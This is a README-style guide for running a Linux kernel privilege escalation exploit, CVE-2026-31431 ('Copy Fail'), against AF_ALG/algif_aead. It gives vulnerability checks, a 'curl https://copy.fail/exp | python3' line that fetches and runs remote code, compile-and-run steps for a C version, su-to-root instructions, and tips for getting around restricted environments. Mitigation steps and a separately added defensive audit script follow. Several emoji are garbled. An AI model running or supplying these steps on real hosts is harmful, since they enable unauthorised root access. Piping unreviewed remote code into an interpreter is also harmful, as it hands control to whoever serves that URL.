Copy Fail (CVE-2026-31431)

April 29, 2026

โš ๏ธ Disclaimer

This content is for educational and authorized security testing purposes only. Do NOT run this on systems without explicit permission.


📌 Overview

Copy Fail (CVE-2026-31431) is a Linux Local Privilege Escalation (LPE) vulnerability affecting the kernel crypto API via AF_ALG.

It allows an unprivileged user to overwrite page cache data of a SUID binary (e.g., /usr/bin/su) and gain root access.


🧠 Requirements

System Requirements

  • Linux kernel (vulnerable – depends on patch status)
  • AF_ALG enabled
  • algif_aead module loaded

Python Exploit Requirements

  • Python 3.10+
  • Support for:
    • os.splice
    • socket(AF_ALG)

๐Ÿ” Checking Vulnerability

uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Expected indicators:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead loaded

๐Ÿ Running the Python Exploit

1. Execute directly

python3 copy_fail_exp.py

2. Or via curl (if remotely hosted)

curl https://copy.fail/exp | python3

3. Trigger root shell

su
id

Expected result:

uid=0(root)

โš ๏ธ Common Issues (Python)

โŒ Error: os.splice not found

Cause:

  • Python version < 3.10
  • Restricted build

Solution:

  • Use a newer Python binary
  • Upload a static Python interpreter

โš™๏ธ Compiling the C Version

1. Compile

gcc copy_fail_exp.c -o copy_fail

2. Make executable

chmod +x copy_fail

3. Run exploit

./copy_fail
su

โš ๏ธ Common Issues (C)

โŒ Exploit runs but no root

Possible causes:

  • Kernel patched
  • Incorrect offsets
  • Environment mismatch

โŒ Compilation errors

Install required tools:

apt update && apt install build-essential

🧪 Troubleshooting

Check if system is patched

dmesg | grep -i alg

Verify module

lsmod | grep algif_aead

๐Ÿ›ก๏ธ Mitigation

Disable vulnerable module

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
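
To confirm that both mitigation steps took effect, here is an added shell audit (not part of the original repository) that reports whether the install override is present and whether algif_aead is still loaded. The function names and verdict strings are this example's own, and the sample data is constructed.

```shell
#!/bin/sh
# Added example: audit for the indicators and mitigation described above.
# Paths are arguments so the functions also work on copies collected from hosts.

# 0 if MOD ($1) appears in a /proc/modules-format file ($2)
module_loaded() {
    awk -v m="$1" '$1 == m { f = 1 } END { exit !f }' "$2"
}

# 0 if any *.conf in DIR ($2) overrides loading of MOD ($1) with /bin/false or
# /bin/true (modprobe treats "-" and "_" in module names as the same character)
load_blocked() {
    cat "$2"/*.conf 2>/dev/null | awk -v m="$1" '
        /^[ \t]*#/ { next }
        { n = $2; gsub(/-/, "_", n) }
        $1 == "install" && n == m && ($3 == "/bin/false" || $3 == "/bin/true") { f = 1 }
        END { exit !f }'
}

# 0 if a /proc/crypto-format file ($1) lists an authencesn(...) algorithm
authencesn_registered() {
    grep -Eq '^name[[:space:]]*:[[:space:]]*authencesn\(' "$1"
}

# Prints one verdict for algif_aead: mitigated | incomplete | unmitigated
audit() {   # $1 = modules file, $2 = modprobe.d directory
    if load_blocked algif_aead "$2"; then
        if module_loaded algif_aead "$1"; then echo incomplete   # rmmod still needed
        else echo mitigated; fi
    else
        echo unmitigated    # no install override configured
    fi
}

# Demo on constructed sample data (not captured from a real host)
d=$(mktemp -d) && mkdir "$d/modprobe.d"
printf 'algif_aead 16384 0 - Live 0x0\naf_alg 32768 1 algif_aead, Live 0x0\n' > "$d/modules"
printf 'name         : authencesn(hmac(sha256),cbc(aes))\nmodule       : authencesn\n' > "$d/crypto"
echo "before: $(audit "$d/modules" "$d/modprobe.d")"
echo 'install algif_aead /bin/false' > "$d/modprobe.d/disable-algif.conf"
echo "config only: $(audit "$d/modules" "$d/modprobe.d")"
: > "$d/modules"
echo "after rmmod: $(audit "$d/modules" "$d/modprobe.d")"
authencesn_registered "$d/crypto" && echo "authencesn registered"
rm -rf "$d"
```

On a live host, call `audit /proc/modules /etc/modprobe.d`; a verdict of `incomplete` means the config line is in place but the module has not been unloaded yet.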

Apply kernel patch

Update your system:

apt update && apt upgrade

📌 Notes

  • Exploit modifies page cache only (non-persistent)
  • Requires local access
  • Not remotely exploitable by default

🧠 Final Insight

If the exploit fails, consider:

  • Kernel already patched
  • Environment restrictions
  • Alternate privilege escalation vectors (SUID, capabilities, sudo misconfig)


๐Ÿ‘จโ€๐Ÿ’ป Author Notes

Use this exploit responsibly in labs, CTFs, and authorized pentests only.